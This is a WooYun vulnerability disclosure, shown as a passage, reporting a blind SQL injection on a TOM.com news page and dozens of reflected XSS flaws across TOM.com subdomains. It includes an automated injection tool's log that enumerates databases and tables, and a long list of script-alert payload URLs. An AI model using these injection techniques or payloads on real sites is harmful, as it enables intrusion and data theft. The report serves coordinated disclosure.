TOM某站又一sql注入和跨站等（上次忘发了）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-07766

漏洞标题：TOM某站又一sql注入和跨站等（上次忘发了）

漏洞作者： zeracker

提交时间：2012-06-01 05:07

修复时间：2012-07-16 05:08

公开时间：2012-07-16 05:08

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2012-06-01：细节已通知厂商并且等待厂商处理中
2012-06-01：厂商已经确认，细节仅向厂商公开
2012-06-11：细节向核心白帽子及相关领域专家公开
2012-06-21：细节向普通白帽子公开
2012-07-01：细节向实习白帽子公开
2012-07-16：细节向公众公开

简要描述：

TOM某站又一sql注入和跨站等（上次忘发了）
各种xss这次补上。
亲，后台认证这块要做足啊。。
口碑一定要树立起来。太卡了跑数据就不必了吧？你懂的

详细说明：

Analyzing http://dgbest.tom.com/news.php?id=32947
Host IP: 202.108.13.17
Web Server: Apache/2.2.8 (Fedora)
Powered-by: PHP/5.2.5
Keyword Found: Golla
Finding Injection type...
I got bored of waiting more than 60 seconds! (request timed out)
Injection type is String (')
I got bored of waiting more than 60 seconds! (request timed out)
DB Server: MySQL >=5
Finding columns count(MySQL,MsSQL 2005): 10
I got bored of waiting more than 60 seconds! (request timed out)
Finding columns count(MySQL,MsSQL 2005): 11
I got bored of waiting more than 60 seconds! (request timed out)
Finding columns count(MySQL,MsSQL 2005): 12
I got bored of waiting more than 60 seconds! (request timed out)
Trying another method using keyword for finding columns count
Findig columns count for MySQL failed!
Testing for MySQL error based injection method
MySQL error based injection method cant be used!
Trying blind method
Finding current data base
Length of 'Current DB' is 6
Current DB: dgbest
Length of 'Table Name' is 11
Table Name: a
Canceling...
Table Name: 
Job Canceled!
Length of 'Data Base' is 18
Data Base: information_schema
Length of 'Data Base' is 5
Data Base: chiru
Length of 'Data Base' is 6
Data Base: dgbest
Length of 'Data Base' is 5
Data Base: mysql
Length of 'Data Base' is 4
Data Base: shop
Length of 'Data Base' is 4
Data Base: test
Can not get Length of 'Data Base'
Length of 'Table Name' is 12
Table Name: columns_priv
Length of 'Table Name' is 2
Table Name: db
Length of 'Table Name' is 4
Table Name: func
Length of 'Table Name' is 13
Table Name: help_category
Length of 'Table Name' is 12
Table Name: help_keyword
Length of 'Table Name' is 13
Table Name: help_relation
Length of 'Table Name' is 10
Table Name: help_topic
Length of 'Table Name' is 4
Table Name: host
Length of 'Table Name' is 4
Table Name: proc
Length of 'Table Name' is 10
Table Name: procs_priv
Length of 'Table Name' is 11
Table Name: tb
Canceling...
Table Name: t
Job Canceled!
Length of 'Column Name' is 4
Column Name: Host

http://pass.tom.com/register.php?svcid=%22%3E%3Cscript%3Ealert%288608012%29%3B%3C/script%3E&backurl=http://www.tom.com/index.html
http://pass.tom.com/register.php?svcid=47&backurl=%22%3E%3Cscript%3Ealert%282329710%29%3B%3C/script%3E
... ...

漏洞证明：

XSS细节：
http://pass.tom.com/register.php?svcid=%22%3E%3Cscript%3Ealert%288608012%29%3B%3C/script%3E&backurl=http://www.tom.com/index.html
http://pass.tom.com/register.php?svcid=47&backurl=%22%3E%3Cscript%3Ealert%282329710%29%3B%3C/script%3E
http://tv.tom.com/App_User_Index.php?source='"><script>alert(6192138);</script><"
http://tv.tom.com/App_User_Index.php?source=HP_LTYZ&issave='"><script>alert(5812062);</script><"&svcid=55&backurl=
http://tv.tom.com/App_User_Index.php?source=HP_LTYZ&issave=0&svcid='"><script>alert(2514545);</script><"&backurl=
http://tv.tom.com/App_User_Index.php?source=HP_LTYZ&issave=0&svcid=55&backurl='"><script>alert(6911033);</script><"
http://tv.tom.com/App_User_Video.php?video_id=24693?source=HP_SPORTS1&issave='"><script>alert(1217088);</script><"&svcid=55&backurl=
http://pass.tom.com/register.php?svcid=%22%3E%3Cscript%3Ealert%287477526%29%3B%3C/script%3E&backurl=http://www.tom.com/checkcode/newgifCheckCode_reg.php?item__ID_SST=
http://tv.tom.com/App_User_Video.php?video_id=24693?source=HP_SPORTS1&issave=0&svcid='"><script>alert(9295565);</script><"&backurl=
http://pass.tom.com/register.php?svcid=47&backurl=%22%3E%3Cscript%3Ealert%289295565%29%3B%3C/script%3E
http://pay.tom.com/?act=skype/activation&back_url=http://ddd.skype.tom.com/skype_ddd/web/user/login.php?tid=1293172135&tm=adf1fd97e8fd1091e6d41cb5f531ce4f&username=&setlang=zh-Hans&partner_id=77836af5e460622bfbced933e3a97dec&return_url=http://pay.tom.com/?act=skype/activation&step='"><script>alert(7301487);</script><"&old_skype_id=&back_url=86474707A3F2F2071697E247F6D6E236F6D6&token=387061
http://pay.tom.com/?act=skype/activation&back_url=http://ddd.skype.tom.com/skype_ddd/web/user/login.php?tid=1293172135&tm=adf1fd97e8fd1091e6d41cb5f531ce4f&username=&setlang=zh-Hans&partner_id=77836af5e460622bfbced933e3a97dec&return_url=http://pay.tom.com/?act=skype/activation&step=check&old_skype_id='"><script>alert(0489486);</script><"&back_url=86474707A3F2F2071697E247F6D6E236F6D6&token=387061
http://client.skype.tom.com/skypebuy/?c=detail&productid=fervor_77_1_1000_conutry&bank=%22%3E%3Cscript%3Ealert%280489486%29%3B%3C/script%3E
http://search.auto.tom.com/search.jsp?pi=1!5&tp='"><script>alert(7085124);</script><"&st=1
http://tv.tom.com/App_User_Video.php?video_id=24660?source=HP_SPORTS1&issave='"><script>alert(1327119);</script><"&svcid=55&backurl=
http://client.skype.tom.com/skypebuy/?c=detail&productid=great_1m_120_yn_gb&bank=%22%3E%3Cscript%3Ealert%281873735%29%3B%3C/script%3E
http://client.skype.tom.com/skypebuy/?c=detail&productid=fervor_26_1_200_north_america&bank=%22%3E%3Cscript%3Ealert%283962814%29%3B%3C/script%3E
http://tv.tom.com/App_User_Video.php?video_id=24693?source=HP_SPORTS1&issave=0&svcid=55&backurl='"><script>alert(8120111);</script><"
http://client.skype.tom.com/skypebuy/?c=detail&productid=great_1m_120_ny_jp&bank=%22%3E%3Cscript%3Ealert%280900076%29%3B%3C/script%3E
http://tv.tom.com/App_User_Video.php?video_id=24660?source=HP_SPORTS1&issave=0&svcid='"><script>alert(9548678);</script><"&backurl=
http://tv.tom.com/App_User_Searchresult.php?searchcontentget='"><script>alert(7860224);</script><"&issave=0&svcid=55&backurl=
http://game.tom.com/beta1/user-center/register.php?game_id='"><script>alert(4117710);</script><"&server_id=0&backurl=http://game.tom.com/index.php&tomid=&tompwd=&button=&issave=true
http://tv.tom.com/App_User_Searchresult.php?searchcontentget=&issave='"><script>alert(4262708);</script><"&svcid=55&backurl=
http://pass.tom.com/safeRecover.php?action=no&backurl=%22%3E%3Cscript%3Ealert%288479476%29%3B%3C/script%3E
http://game.tom.com/beta1/user-center/register.php?game_id=0&server_id='"><script>alert(0685107);</script><"&backurl=http://game.tom.com/index.php&tomid=&tompwd=&button=&issave=true
http://tv.tom.com/App_User_Searchresult.php?searchcontentget=&issave=0&svcid='"><script>alert(7326333);</script><"&backurl=
http://game.tom.com/beta1/user-center/register.php?game_id=0&server_id=0&backurl='"><script>alert(0243931);</script><"&tomid=&tompwd=&button=&issave=true
http://tv.tom.com/App_User_Searchresult.php?searchcontentget=&issave=0&svcid=55&backurl='"><script>alert(7607889);</script><"
http://game.tom.com/beta1/user-center/register.php?game_id=0&server_id=0&backurl=http://game.tom.com/index.php&tomid='"><script>alert(1339477);</script><"&tompwd=&button=&issave=true
http://tv.tom.com/App_User_Video.php?video_id=24660?source=HP_SPORTS1&issave=0&svcid=55&backurl='"><script>alert(7170659);</script><"
http://yule.tv.tom.com/App_User_Video.php?video_id=24730&issave='"><script>alert(3642752);</script><"&svcid=55&backurl=
http://game.tom.com/beta1/user-center/register.php?game_id=0&server_id=0&backurl=http://game.tom.com/index.php&tomid=&tompwd='"><script>alert(7216621);</script><"&button=&issave=true
http://game.tom.com/beta1/user-center/register.php?game_id=0&server_id=0&backurl=http://game.tom.com/index.php&tomid=&tompwd=&button='"><script>alert(8360059);</script><"&issave=true
http://tv.tom.com/App_User_Video.php?video_id=12634&issave='"><script>alert(6323733);</script><"&svcid=55&backurl=
http://yule.tv.tom.com/App_User_Video.php?video_id=24730&issave=0&svcid='"><script>alert(8925135);</script><"&backurl=
http://game.tom.com/game_reg/?act=zqtx2&backurl=http://f.game.tom.com/zqtx/&UNION_NO=1234&PCID=0&source=%22%3E%3Cscript%3Ealert%281601736%29%3B%3C/script%3E&SERVER_ID=0&GAME_ID=74&operation=register
http://game.tom.com/beta1/user-center/register.php?game_id=0&server_id=0&backurl=http://game.tom.com/index.php&tomid=&tompwd=&button=&issave='"><script>alert(6085030);</script><"
http://tv.tom.com/App_User_Video.php?video_id=12634&issave=0&svcid='"><script>alert(1840008);</script><"&backurl=
http://yule.tv.tom.com/App_User_Video.php?video_id=24730&issave=0&svcid=55&backurl='"><script>alert(1840008);</script><"
http://tv.tom.com/App_User_Video.php?video_id=12634&issave=0&svcid=55&backurl='"><script>alert(8233209);</script><"
http://game.tom.com/game_reg/?act=yc_reg&backurl=http://game.tom.com/beta1/login/logining.php?gameid=27&UNION_NO=1234&PCID=0&source=%22%3E%3Cscript%3Ealert%286136891%29%3B%3C/script%3E&SERVER_ID=0&GAME_ID=27&operation=register&svcid=23&issave=off
http://search.auto.tom.com/souauto.jsp?kw='"><script>alert(7336866);</script><"
http://data.auto.tom.com/search.jsp?pi=1!200&cls='"><script>alert(9090360);</script><"&disp=&body=&tm=&tp=1&st=1
http://sou.dushu.tom.com/?a=result&search_content=%22%3E%3Cscript%3Ealert%282714190%29%3B%3C/script%3E
http://data.auto.tom.com/search.jsp?pi=1!200&cls=S&disp=&body=&tm='"><script>alert(5819906);</script><"&tp=1&st=1
http://data.auto.tom.com/search.jsp?pi=1!200&cls=S&disp=&body=&tm=&tp='"><script>alert(1809258);</script><"&st=1
http://client.skype.tom.com/skypebuy/?c=detail&productid=great_1m_120_yn_gb&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/great_1m_120_yn_gb_big.jpg&min_rate_0=0.14&prd_real_fee_0=17&productid_0=great_1m_120_yn_gb&product_name_0=英国套餐120分钟-座机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/great_3m_120_yn_gb_big.jpg&min_rate_1=0.14&prd_real_fee_1=51&productid_1=great_3m_120_yn_gb&product_name_1=英国套餐120分钟-座机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/great_12m_120_yn_gb_big.jpg&min_rate_2=0.14&prd_real_fee_2=203&productid_2=great_12m_120_yn_gb&product_name_2=英国套餐120分钟-座机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=%22%3E%3Cscript%3Ealert%288893495%29%3B%3C/script%3E&productid=great_1m_120_yn_gb&svcid=20&serviceprovider=union_skype&action=confirmorder&passportname=&product_quantity=1&cover=http://client.skype.tom.com/skypebuy/temp/great_1m_120_yn_gb_big.jpg&min_rate=0.14&valid_timelength=30&prd_class=0&product_name=英国套餐120分钟-座机月卡&prd_real_fee=17
http://client.skype.tom.com/skypebuy/?c=detail&productid=fervor_77_1_1000_conutry&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/fervor_77_1_1000_conutry_big.jpg&min_rate_0=0.08&prd_real_fee_0=77&productid_0=fervor_77_1_1000_conutry&product_name_0=中国大陆通套餐1000分钟--手机&座机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/fervor_77_3_1000_conutry_big.jpg&min_rate_1=0.07&prd_real_fee_1=220&productid_1=fervor_77_3_1000_conutry&product_name_1=中国大陆通套餐1000分钟--手机&座机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/fervor_77_12_1000_conutry_big.jpg&min_rate_2=0.06&prd_real_fee_2=765&productid_2=fervor_77_12_1000_conutry&product_name_2=中国大陆通套餐1000分钟--手机&座机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=%22%3E%3Cscript%3Ealert%286482199%29%3B%3C/script%3E&productid=fervor_77_1_1000_conutry&svcid=20&serviceprovider=union_skype&action=confirmorder&passportname=&product_quantity=1&cover=http://client.skype.tom.com/skypebuy/temp/fervor_77_1_1000_conutry_big.jpg&min_rate=0.08&valid_timelength=30&prd_class=0&product_name=中国大陆通套餐1000分钟--手机&座机月卡&prd_real_fee=77
http://client.skype.tom.com/skypebuy/?c=detail&productid=fervor_77_1_1000_conutry&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/fervor_77_1_1000_conutry_big.jpg&min_rate_0=0.08&prd_real_fee_0=77&productid_0=fervor_77_1_1000_conutry&product_name_0=中国大陆通套餐1000分钟--手机&座机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/fervor_77_3_1000_conutry_big.jpg&min_rate_1=0.07&prd_real_fee_1=220&productid_1=fervor_77_3_1000_conutry&product_name_1=中国大陆通套餐1000分钟--手机&座机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/fervor_77_12_1000_conutry_big.jpg&min_rate_2=0.06&prd_real_fee_2=765&productid_2=fervor_77_12_1000_conutry&product_name_2=中国大陆通套餐1000分钟--手机&座机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=tangyuan&productid=fervor_77_1_1000_conutry&svcid=20&serviceprovider=%22%3E%3Cscript%3Ealert%289059416%29%3B%3C/script%3E&action=confirmorder&passportname=&product_quantity=1&cover=http://client.skype.tom.com/skypebuy/temp/fervor_77_1_1000_conutry_big.jpg&min_rate=0.08&valid_timelength=30&prd_class=0&product_name=中国大陆通套餐1000分钟--手机&座机月卡&prd_real_fee=77
http://client.skype.tom.com/skypebuy/?c=detail&productid=great_1m_120_yn_gb&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/great_1m_120_yn_gb_big.jpg&min_rate_0=0.14&prd_real_fee_0=17&productid_0=great_1m_120_yn_gb&product_name_0=英国套餐120分钟-座机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/great_3m_120_yn_gb_big.jpg&min_rate_1=0.14&prd_real_fee_1=51&productid_1=great_3m_120_yn_gb&product_name_1=英国套餐120分钟-座机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/great_12m_120_yn_gb_big.jpg&min_rate_2=0.14&prd_real_fee_2=203&productid_2=great_12m_120_yn_gb&product_name_2=英国套餐120分钟-座机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=tangyuan&productid=great_1m_120_yn_gb&svcid=20&serviceprovider=%22%3E%3Cscript%3Ealert%284890547%29%3B%3C/script%3E&action=confirmorder&passportname=&product_quantity=1&cover=http://client.skype.tom.com/skypebuy/temp/great_1m_120_yn_gb_big.jpg&min_rate=0.14&valid_timelength=30&prd_class=0&product_name=英国套餐120分钟-座机月卡&prd_real_fee=17
http://client.skype.tom.com/skypebuy/?c=detail&productid=fervor_77_1_1000_conutry&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/fervor_77_1_1000_conutry_big.jpg&min_rate_0=0.08&prd_real_fee_0=77&productid_0=fervor_77_1_1000_conutry&product_name_0=中国大陆通套餐1000分钟--手机&座机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/fervor_77_3_1000_conutry_big.jpg&min_rate_1=0.07&prd_real_fee_1=220&productid_1=fervor_77_3_1000_conutry&product_name_1=中国大陆通套餐1000分钟--手机&座机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/fervor_77_12_1000_conutry_big.jpg&min_rate_2=0.06&prd_real_fee_2=765&productid_2=fervor_77_12_1000_conutry&product_name_2=中国大陆通套餐1000分钟--手机&座机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=tangyuan&productid=fervor_77_1_1000_conutry&svcid=20&serviceprovider=union_skype&action=confirmorder&passportname=%22%3E%3Cscript%3Ealert%289603145%29%3B%3C/script%3E&product_quantity=1&cover=http://client.skype.tom.com/skypebuy/temp/fervor_77_1_1000_conutry_big.jpg&min_rate=0.08&valid_timelength=30&prd_class=0&product_name=中国大陆通套餐1000分钟--手机&座机月卡&prd_real_fee=77
http://client.skype.tom.com/skypebuy/?c=detail&productid=great_1m_120_yn_gb&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/great_1m_120_yn_gb_big.jpg&min_rate_0=0.14&prd_real_fee_0=17&productid_0=great_1m_120_yn_gb&product_name_0=英国套餐120分钟-座机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/great_3m_120_yn_gb_big.jpg&min_rate_1=0.14&prd_real_fee_1=51&productid_1=great_3m_120_yn_gb&product_name_1=英国套餐120分钟-座机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/great_12m_120_yn_gb_big.jpg&min_rate_2=0.14&prd_real_fee_2=203&productid_2=great_12m_120_yn_gb&product_name_2=英国套餐120分钟-座机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=tangyuan&productid=great_1m_120_yn_gb&svcid=20&serviceprovider=union_skype&action=confirmorder&passportname=%22%3E%3Cscript%3Ealert%285266347%29%3B%3C/script%3E&product_quantity=1&cover=http://client.skype.tom.com/skypebuy/temp/great_1m_120_yn_gb_big.jpg&min_rate=0.14&valid_timelength=30&prd_class=0&product_name=英国套餐120分钟-座机月卡&prd_real_fee=17
http://client.skype.tom.com/skypebuy/?c=detail&productid=fervor_77_1_1000_conutry&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/fervor_77_1_1000_conutry_big.jpg&min_rate_0=0.08&prd_real_fee_0=77&productid_0=fervor_77_1_1000_conutry&product_name_0=中国大陆通套餐1000分钟--手机&座机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/fervor_77_3_1000_conutry_big.jpg&min_rate_1=0.07&prd_real_fee_1=220&productid_1=fervor_77_3_1000_conutry&product_name_1=中国大陆通套餐1000分钟--手机&座机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/fervor_77_12_1000_conutry_big.jpg&min_rate_2=0.06&prd_real_fee_2=765&productid_2=fervor_77_12_1000_conutry&product_name_2=中国大陆通套餐1000分钟--手机&座机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=tangyuan&productid=fervor_77_1_1000_conutry&svcid=20&serviceprovider=union_skype&action=confirmorder&passportname=&product_quantity=%22%3E%3Cscript%3Ealert%287681220%29%3B%3C/script%3E&cover=http://client.skype.tom.com/skypebuy/temp/fervor_77_1_1000_conutry_big.jpg&min_rate=0.08&valid_timelength=30&prd_class=0&product_name=中国大陆通套餐1000分钟--手机&座机月卡&prd_real_fee=77
http://client.skype.tom.com/skypebuy/?c=detail&productid=great_1m_120_yn_gb&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/great_1m_120_yn_gb_big.jpg&min_rate_0=0.14&prd_real_fee_0=17&productid_0=great_1m_120_yn_gb&product_name_0=英国套餐120分钟-座机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/great_3m_120_yn_gb_big.jpg&min_rate_1=0.14&prd_real_fee_1=51&productid_1=great_3m_120_yn_gb&product_name_1=英国套餐120分钟-座机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/great_12m_120_yn_gb_big.jpg&min_rate_2=0.14&prd_real_fee_2=203&productid_2=great_12m_120_yn_gb&product_name_2=英国套餐120分钟-座机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=tangyuan&productid=great_1m_120_yn_gb&svcid=20&serviceprovider=union_skype&action=confirmorder&passportname=&product_quantity=%22%3E%3Cscript%3Ealert%284598104%29%3B%3C/script%3E&cover=http://client.skype.tom.com/skypebuy/temp/great_1m_120_yn_gb_big.jpg&min_rate=0.14&valid_timelength=30&prd_class=0&product_name=英国套餐120分钟-座机月卡&prd_real_fee=17
http://client.skype.tom.com/skypebuy/?c=detail&productid=fervor_26_1_200_north_america&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/fervor_26_1_200_north_america_big.jpg&min_rate_0=0.13&prd_real_fee_0=26&productid_0=fervor_26_1_200_north_america&product_name_0=美加套餐200分钟-手机&座机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/great_3m_200_yy_usca_big.jpg&min_rate_1=0.13&prd_real_fee_1=78&productid_1=great_3m_200_yy_usca&product_name_1=美加套餐200分钟-手机&座机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/great_12m_200_yy_usca_big.jpg&min_rate_2=0.13&prd_real_fee_2=311&productid_2=great_12m_200_yy_usca&product_name_2=美加套餐200分钟-手机&座机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=%22%3E%3Cscript%3Ealert%283019019%29%3B%3C/script%3E&productid=fervor_26_1_200_north_america&svcid=20&serviceprovider=union_skype&action=confirmorder&passportname=&product_quantity=1&cover=http://client.skype.tom.com/skypebuy/temp/fervor_26_1_200_north_america_big.jpg&min_rate=0.13&valid_timelength=30&prd_class=0&product_name=美加套餐200分钟-手机&座机月卡&prd_real_fee=26
http://client.skype.tom.com/skypebuy/?c=detail&productid=great_1m_120_ny_jp&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/great_1m_120_ny_jp_big.jpg&min_rate_0=1&prd_real_fee_0=120&productid_0=great_1m_120_ny_jp&product_name_0=日本套餐120分钟-手机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/great_3m_120_ny_jp_big.jpg&min_rate_1=1&prd_real_fee_1=360&productid_1=great_3m_120_ny_jp&product_name_1=日本套餐120分钟-手机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/great_12m_120_ny_jp_big.jpg&min_rate_2=1&prd_real_fee_2=1439&productid_2=great_12m_120_ny_jp&product_name_2=日本套餐120分钟-手机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=%22%3E%3Cscript%3Ealert%283213188%29%3B%3C/script%3E&productid=great_1m_120_ny_jp&svcid=20&serviceprovider=union_skype&action=confirmorder&passportname=&product_quantity=1&cover=http://client.skype.tom.com/skypebuy/temp/great_1m_120_ny_jp_big.jpg&min_rate=1&valid_timelength=30&prd_class=0&product_name=日本套餐120分钟-手机月卡&prd_real_fee=120
http://client.skype.tom.com/skypebuy/?c=detail&productid=fervor_77_1_1000_conutry&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/fervor_77_1_1000_conutry_big.jpg&min_rate_0=0.08&prd_real_fee_0=77&productid_0=fervor_77_1_1000_conutry&product_name_0=中国大陆通套餐1000分钟--手机&座机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/fervor_77_3_1000_conutry_big.jpg&min_rate_1=0.07&prd_real_fee_1=220&productid_1=fervor_77_3_1000_conutry&product_name_1=中国大陆通套餐1000分钟--手机&座机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/fervor_77_12_1000_conutry_big.jpg&min_rate_2=0.06&prd_real_fee_2=765&productid_2=fervor_77_12_1000_conutry&product_name_2=中国大陆通套餐1000分钟--手机&座机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=tangyuan&productid=fervor_77_1_1000_conutry&svcid=20&serviceprovider=union_skype&action=confirmorder&passportname=&product_quantity=1&cover=http://client.skype.tom.com/skypebuy/temp/fervor_77_1_1000_conutry_big.jpg&min_rate=%22%3E%3Cscript%3Ealert%288799889%29%3B%3C/script%3E&valid_timelength=30&prd_class=0&product_name=中国大陆通套餐1000分钟--手机&座机月卡&prd_real_fee=77
http://client.skype.tom.com/skypebuy/?c=detail&productid=great_1m_120_yn_gb&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/great_1m_120_yn_gb_big.jpg&min_rate_0=0.14&prd_real_fee_0=17&productid_0=great_1m_120_yn_gb&product_name_0=英国套餐120分钟-座机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/great_3m_120_yn_gb_big.jpg&min_rate_1=0.14&prd_real_fee_1=51&productid_1=great_3m_120_yn_gb&product_name_1=英国套餐120分钟-座机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/great_12m_120_yn_gb_big.jpg&min_rate_2=0.14&prd_real_fee_2=203&productid_2=great_12m_120_yn_gb&product_name_2=英国套餐120分钟-座机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=tangyuan&productid=great_1m_120_yn_gb&svcid=20&serviceprovider=union_skype&action=confirmorder&passportname=&product_quantity=1&cover=http://client.skype.tom.com/skypebuy/temp/great_1m_120_yn_gb_big.jpg&min_rate=%22%3E%3Cscript%3Ealert%280186589%29%3B%3C/script%3E&valid_timelength=30&prd_class=0&product_name=英国套餐120分钟-座机月卡&prd_real_fee=17
http://client.skype.tom.com/skypebuy/?c=detail&productid=great_1m_120_ny_jp&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/great_1m_120_ny_jp_big.jpg&min_rate_0=1&prd_real_fee_0=120&productid_0=great_1m_120_ny_jp&product_name_0=日本套餐120分钟-手机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/great_3m_120_ny_jp_big.jpg&min_rate_1=1&prd_real_fee_1=360&productid_1=great_3m_120_ny_jp&product_name_1=日本套餐120分钟-手机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/great_12m_120_ny_jp_big.jpg&min_rate_2=1&prd_real_fee_2=1439&productid_2=great_12m_120_ny_jp&product_name_2=日本套餐120分钟-手机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=tangyuan&productid=great_1m_120_ny_jp&svcid=20&serviceprovider=%22%3E%3Cscript%3Ealert%286488869%29%3B%3C/script%3E&action=confirmorder&passportname=&product_quantity=1&cover=http://client.skype.tom.com/skypebuy/temp/great_1m_120_ny_jp_big.jpg&min_rate=1&valid_timelength=30&prd_class=0&product_name=日本套餐120分钟-手机月卡&prd_real_fee=120
http://client.skype.tom.com/skypebuy/?c=detail&productid=great_1m_120_yn_gb&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/great_1m_120_yn_gb_big.jpg&min_rate_0=0.14&prd_real_fee_0=17&productid_0=great_1m_120_yn_gb&product_name_0=英国套餐120分钟-座机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/great_3m_120_yn_gb_big.jpg&min_rate_1=0.14&prd_real_fee_1=51&productid_1=great_3m_120_yn_gb&product_name_1=英国套餐120分钟-座机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/great_12m_120_yn_gb_big.jpg&min_rate_2=0.14&prd_real_fee_2=203&productid_2=great_12m_120_yn_gb&product_name_2=英国套餐120分钟-座机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=tangyuan&productid=great_1m_120_yn_gb&svcid=20&serviceprovider=union_skype&action=confirmorder&passportname=&product_quantity=1&cover=http://client.skype.tom.com/skypebuy/temp/great_1m_120_yn_gb_big.jpg&min_rate=0.14&valid_timelength=%22%3E%3Cscript%3Ealert%284337265%29%3B%3C/script%3E&prd_class=0&product_name=英国套餐120分钟-座机月卡&prd_real_fee=17
http://client.skype.tom.com/skypebuy/?c=detail&productid=great_1m_120_ny_jp&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/great_1m_120_ny_jp_big.jpg&min_rate_0=1&prd_real_fee_0=120&productid_0=great_1m_120_ny_jp&product_name_0=日本套餐120分钟-手机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/great_3m_120_ny_jp_big.jpg&min_rate_1=1&prd_real_fee_1=360&productid_1=great_3m_120_ny_jp&product_name_1=日本套餐120分钟-手机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/great_12m_120_ny_jp_big.jpg&min_rate_2=1&prd_real_fee_2=1439&productid_2=great_12m_120_ny_jp&product_name_2=日本套餐120分钟-手机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=tangyuan&productid=great_1m_120_ny_jp&svcid=20&serviceprovider=union_skype&action=confirmorder&passportname=%22%3E%3Cscript%3Ealert%284337265%29%3B%3C/script%3E&product_quantity=1&